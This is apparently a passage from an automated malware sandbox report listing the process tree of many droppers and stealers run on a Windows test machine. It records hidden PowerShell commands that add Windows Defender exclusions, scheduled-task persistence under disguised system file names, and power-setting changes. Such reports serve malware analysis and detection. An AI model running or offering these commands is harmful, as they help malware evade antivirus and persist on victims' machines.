--session-guid=98c6fcbb-8fdf-4fa7-8a38-d0de706c7233 --server-tracking-blob=NmNmNzk1ZjM2ZGIzNmFlZGZhNmZlZTcwZTA1MmYyMTkzN2M5Nzk3ZDIzZmQzMGE5MTVkMDEwNjZjZjJmNTYzMDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N183ODkiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMSIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTI2OTQyOTkuMTAyNCIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N183ODkiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6ImNmZWQ0Y2QwLTM2NzgtNGNmOS1hMGZiLTY5ZmNkMmQ5MjBlNiJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=2C05000000000000
5⤵
PID:6052

C:\Users\Admin\Pictures\LfieJN6ZDcXxWF1r2CC19uMl.exe
C:\Users\Admin\Pictures\LfieJN6ZDcXxWF1r2CC19uMl.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x69d7e1d0,0x69d7e1dc,0x69d7e1e8
6⤵
PID:5440

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404092025351\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404092025351\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
5⤵
PID:6276

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404092025351\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404092025351\assistant\assistant_installer.exe" --version
5⤵
PID:2600

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404092025351\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404092025351\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x288,0x28c,0x290,0x284,0x294,0x6e0040,0x6e004c,0x6e0058
6⤵
PID:6152

C:\Users\Admin\Pictures\eOItr3ls3Sku2p5xOHf9CCo8.exe
"C:\Users\Admin\Pictures\eOItr3ls3Sku2p5xOHf9CCo8.exe"
4⤵
PID:2408

C:\Users\Admin\AppData\Local\Temp\7zSFB80.tmp\Install.exe
.\Install.exe /ZxdidaFRO "385118" /S
5⤵
PID:4508

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
6⤵
PID:4836

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
PID:4260

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bvsYAGfGVfhExjZmnp" /SC once /ST 20:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\rmugjdj.exe\" my /FJsite_idFcc 385118 /S" /V1 /F
6⤵
- DcRat
- Creates scheduled task(s)
PID:6316

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "bvsYAGfGVfhExjZmnp"
6⤵
PID:6620

C:\Users\Admin\Pictures\GU1XJGLbjJiUYBbVYdX4FnaP.exe
"C:\Users\Admin\Pictures\GU1XJGLbjJiUYBbVYdX4FnaP.exe"
4⤵
PID:3856

C:\Users\Admin\AppData\Local\Temp\7zSFA28.tmp\Install.exe
.\Install.exe /ZxdidaFRO "385118" /S
5⤵
PID:2916

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
6⤵
PID:6932

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
PID:6808

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bvsYAGfGVfhExjZmnp" /SC once /ST 20:28:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\FSlXJHm.exe\" my /pHsite_idQxW 385118 /S" /V1 /F
6⤵
- DcRat
- Creates scheduled task(s)
PID:6296

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "bvsYAGfGVfhExjZmnp"
6⤵
PID:6604

C:\Users\Admin\AppData\Local\Temp\a\ISetup10.exe
"C:\Users\Admin\AppData\Local\Temp\a\ISetup10.exe"
2⤵
PID:3884

C:\Users\Admin\AppData\Local\Temp\u2zw.0.exe
"C:\Users\Admin\AppData\Local\Temp\u2zw.0.exe"
3⤵
PID:2104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 1100
4⤵
- Program crash
PID:2076

C:\Users\Admin\AppData\Local\Temp\u2zw.1.exe
"C:\Users\Admin\AppData\Local\Temp\u2zw.1.exe"
3⤵
PID:764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 1204
3⤵
- Program crash
PID:3568

C:\Users\Admin\AppData\Local\Temp\a\koooooo.exe
"C:\Users\Admin\AppData\Local\Temp\a\koooooo.exe"
2⤵
- Suspicious use of SetThreadContext
PID:2420

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 884
3⤵
- Program crash
PID:4524

C:\Users\Admin\AppData\Local\Temp\a\Titanium.exe
"C:\Users\Admin\AppData\Local\Temp\a\Titanium.exe"
2⤵
PID:1980

C:\Users\Admin\AppData\Local\Temp\a\Crypto.exe
"C:\Users\Admin\AppData\Local\Temp\a\Crypto.exe"
2⤵
PID:1792

C:\Users\Admin\AppData\Local\Temp\a\LummaC2.exe
"C:\Users\Admin\AppData\Local\Temp\a\LummaC2.exe"
2⤵
PID:3004

C:\Users\Admin\AppData\Local\Temp\a\DemagogicAlewife.exe
"C:\Users\Admin\AppData\Local\Temp\a\DemagogicAlewife.exe"
2⤵
PID:2380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2380 -s 2060
3⤵
- Program crash
PID:6352

C:\Users\Admin\AppData\Local\Temp\a\RoulleteBotPro_x32-x64.exe
"C:\Users\Admin\AppData\Local\Temp\a\RoulleteBotPro_x32-x64.exe"
2⤵
PID:244

C:\Users\Admin\AppData\Local\Temp\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\a\random.exe"
2⤵
PID:4888

C:\Users\Admin\AppData\Local\Temp\a\asdfg.exe
"C:\Users\Admin\AppData\Local\Temp\a\asdfg.exe"
2⤵
PID:5920

C:\Users\Admin\AppData\Local\Temp\a\lumma2.exe
"C:\Users\Admin\AppData\Local\Temp\a\lumma2.exe"
2⤵
PID:4656

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5868

C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe
"C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe"
2⤵
PID:1988

C:\Users\Admin\AppData\Local\Temp\a\pt.exe
"C:\Users\Admin\AppData\Local\Temp\a\pt.exe"
2⤵
PID:4276

C:\Windows\system32\cmd.exe
"cmd" /C tasklist
3⤵
PID:2472

C:\Users\Admin\AppData\Local\Temp\a\AppGate2103v01.exe
"C:\Users\Admin\AppData\Local\Temp\a\AppGate2103v01.exe"
2⤵
PID:5408

C:\Users\Admin\AppData\Local\Temp\a\TrueCrypt_nKJqAu.exe
"C:\Users\Admin\AppData\Local\Temp\a\TrueCrypt_nKJqAu.exe"
2⤵
PID:6880

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
3⤵
PID:3356

C:\Users\Admin\AppData\Local\Temp\a\bd2.exe
"C:\Users\Admin\AppData\Local\Temp\a\bd2.exe"
2⤵
PID:4916

C:\Windows\SysWOW64\wscript.exe
"wscript.exe" "C:\Users\Admin\start.vbs"
3⤵
PID:1580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "
4⤵
PID:6608

C:\Users\Admin\AppData\Local\Temp\a\redlinepanel.exe
"C:\Users\Admin\AppData\Local\Temp\a\redlinepanel.exe"
2⤵
PID:6548

C:\Users\Admin\AppData\Local\Temp\a\un300un.exe
"C:\Users\Admin\AppData\Local\Temp\a\un300un.exe"
2⤵
PID:7144

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
3⤵
PID:5524

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
3⤵
PID:6156

C:\Users\Admin\Pictures\f7qgmqPXBbSDRaWnPZQFlLbA.exe
"C:\Users\Admin\Pictures\f7qgmqPXBbSDRaWnPZQFlLbA.exe"
4⤵
PID:1400

C:\Users\Admin\AppData\Local\Temp\u12w.0.exe
"C:\Users\Admin\AppData\Local\Temp\u12w.0.exe"
5⤵
PID:6796

C:\Users\Admin\AppData\Local\Temp\u12w.1.exe
"C:\Users\Admin\AppData\Local\Temp\u12w.1.exe"
5⤵
PID:5456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 1176
5⤵
- Program crash
PID:4040

C:\Users\Admin\Pictures\Ug46WUm3e49NGtQ7SALnNZbd.exe
"C:\Users\Admin\Pictures\Ug46WUm3e49NGtQ7SALnNZbd.exe"
4⤵
PID:4344

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:6544

C:\Users\Admin\Pictures\eWK189NUBUfZkiT5jpCWJncB.exe
"C:\Users\Admin\Pictures\eWK189NUBUfZkiT5jpCWJncB.exe"
4⤵
PID:6096

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:6904

C:\Users\Admin\Pictures\gnH18QftKKtQHk8nxeK32Rf0.exe
"C:\Users\Admin\Pictures\gnH18QftKKtQHk8nxeK32Rf0.exe" --silent --allusers=0
4⤵
PID:652

C:\Users\Admin\Pictures\gnH18QftKKtQHk8nxeK32Rf0.exe
C:\Users\Admin\Pictures\gnH18QftKKtQHk8nxeK32Rf0.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2bc,0x2c4,0x2c8,0x2c0,0x2cc,0x68a8e1d0,0x68a8e1dc,0x68a8e1e8
5⤵
PID:2720

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\gnH18QftKKtQHk8nxeK32Rf0.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\gnH18QftKKtQHk8nxeK32Rf0.exe" --version
5⤵
PID:6636

C:\Users\Admin\Pictures\iV7AQm217eBE88U0x7QGJlFa.exe
"C:\Users\Admin\Pictures\iV7AQm217eBE88U0x7QGJlFa.exe"
4⤵
PID:4092

C:\Users\Admin\AppData\Local\Temp\7zS7E62.tmp\Install.exe
.\Install.exe /ZxdidaFRO "385118" /S
5⤵
PID:1920

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
6⤵
PID:6456

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
PID:5488

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bvsYAGfGVfhExjZmnp" /SC once /ST 20:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\ndmBfRA.exe\" my /yosite_idNAK 385118 /S" /V1 /F
6⤵
- DcRat
- Creates scheduled task(s)
PID:5276

C:\Users\Admin\Pictures\9urIO07h0HMnuMGDQTOQlJa5.exe
"C:\Users\Admin\Pictures\9urIO07h0HMnuMGDQTOQlJa5.exe"
4⤵
PID:6528

C:\Users\Admin\Pictures\lyqxMbp0zuVboRy7enNp6N7d.exe
"C:\Users\Admin\Pictures\lyqxMbp0zuVboRy7enNp6N7d.exe"
4⤵
PID:2736

C:\Users\Admin\AppData\Local\Temp\7zS8901.tmp\Install.exe
.\Install.exe /ZxdidaFRO "385118" /S
5⤵
PID:5180

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
6⤵
PID:6088

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
PID:6680

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bvsYAGfGVfhExjZmnp" /SC once /ST 20:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\KftWcMZ.exe\" my /OFsite_ideWL 385118 /S" /V1 /F
6⤵
- DcRat
- Creates scheduled task(s)
PID:1724

C:\Users\Admin\AppData\Local\Temp\a\file.exe
"C:\Users\Admin\AppData\Local\Temp\a\file.exe"
2⤵
PID:2356

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.vbs"
3⤵
PID:2704

C:\Users\Admin\AppData\Local\Temp\RarSFX0\update.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\update.exe"
4⤵
PID:6048

C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.exe"
4⤵
PID:6388

C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe
"C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe"
2⤵
PID:4364

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\EHJDGCBGDB.exe"
3⤵
PID:7544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4364 -s 3392
3⤵
- Program crash
PID:7276

C:\Users\Admin\AppData\Local\Temp\a\appdata.exe
"C:\Users\Admin\AppData\Local\Temp\a\appdata.exe"
2⤵
PID:6872

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6076

C:\Users\Admin\AppData\Local\Temp\a\amadycry.exe
"C:\Users\Admin\AppData\Local\Temp\a\amadycry.exe"
2⤵
PID:2008

C:\Users\Admin\AppData\Local\Temp\a\afile.exe
"C:\Users\Admin\AppData\Local\Temp\a\afile.exe"
2⤵
PID:6476

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6476 -s 808
3⤵
- Program crash
PID:6836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6476 -s 808
3⤵
- Program crash
PID:2948

C:\Users\Admin\AppData\Local\Temp\a\RDX.exe
"C:\Users\Admin\AppData\Local\Temp\a\RDX.exe"
2⤵
PID:6996

C:\Users\Admin\AppData\Local\Temp\a\wr.exe
"C:\Users\Admin\AppData\Local\Temp\a\wr.exe"
2⤵
PID:4620

C:\Users\Admin\AppData\Local\Temp\a\avgrec.exe
"" ""
3⤵
PID:6032

C:\Users\Admin\AppData\Local\Temp\a\lumma21.exe
"C:\Users\Admin\AppData\Local\Temp\a\lumma21.exe"
2⤵
PID:6612

C:\Users\Admin\AppData\Local\Temp\a\chckik.exe
"C:\Users\Admin\AppData\Local\Temp\a\chckik.exe"
2⤵
PID:2796

C:\Users\Admin\AppData\Local\Temp\a\Fullwork123.exe
"C:\Users\Admin\AppData\Local\Temp\a\Fullwork123.exe"
2⤵
PID:3660

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2108

C:\Users\Admin\AppData\Local\Temp\a\mk.exe
"C:\Users\Admin\AppData\Local\Temp\a\mk.exe"
2⤵
PID:2492

C:\Users\Admin\AppData\Local\Temp\a\go.exe
"C:\Users\Admin\AppData\Local\Temp\a\go.exe"
2⤵
PID:6268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
3⤵
PID:7568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xe0,0x104,0x108,0xa8,0x10c,0x7ff98aa03cb8,0x7ff98aa03cc8,0x7ff98aa03cd8
4⤵
PID:7680

C:\Users\Admin\AppData\Local\Temp\a\file300un-1.exe
"C:\Users\Admin\AppData\Local\Temp\a\file300un-1.exe"
2⤵
PID:5888

C:\Users\Admin\AppData\Local\Temp\a\boomlumma.exe
"C:\Users\Admin\AppData\Local\Temp\a\boomlumma.exe"
2⤵
PID:4916

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:7892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 788
3⤵
- Program crash
PID:7020

C:\Users\Admin\AppData\Local\Temp\a\fud.exe
"C:\Users\Admin\AppData\Local\Temp\a\fud.exe"
2⤵
PID:8120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3480 -ip 3480
1⤵
PID:4668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4044 -ip 4044
1⤵
PID:4712

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3340 -ip 3340
1⤵
PID:2676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4932 -ip 4932
1⤵
PID:5096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5212 -ip 5212
1⤵
PID:5844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2092 -ip 2092
1⤵
PID:5900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4016 -ip 4016
1⤵
PID:5948

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5432

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
2⤵
- Executes dropped EXE
- Enumerates connected drives
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2752

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 596
3⤵
- Program crash
PID:5492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 612
2⤵
- Program crash
PID:5516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 6132 -ip 6132
1⤵
PID:6084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5804 -ip 5804
1⤵
PID:1476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 372 -p 5432 -ip 5432
1⤵
PID:2872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5852 -ip 5852
1⤵
PID:5756

C:\Windows\svchost.exe
C:\Windows\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5324 -ip 5324
1⤵
PID:2576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 5748 -ip 5748
1⤵
PID:4648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 5868 -ip 5868
1⤵
PID:1372

C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1916

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3872

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1272

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:4660

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5616

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:308

C:\Windows\system32\svchost.exe
svchost.exe
2⤵
PID:3632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "new1n" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\new1.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "new1" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\new1.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "new1n" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\new1.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "agentDllDhcpa" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\agentDllDhcp.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "agentDllDhcp" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\agentDllDhcp.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "agentDllDhcpa" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\agentDllDhcp.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Program Files\Mozilla Firefox\services.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\services.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:288

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Program Files\Mozilla Firefox\services.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Program Files\Internet Explorer\SIGNUP\System.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3892

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\SIGNUP\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Internet Explorer\SIGNUP\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\SearchHost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\SearchHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5160

C:\Windows\system32\schtasks.exe
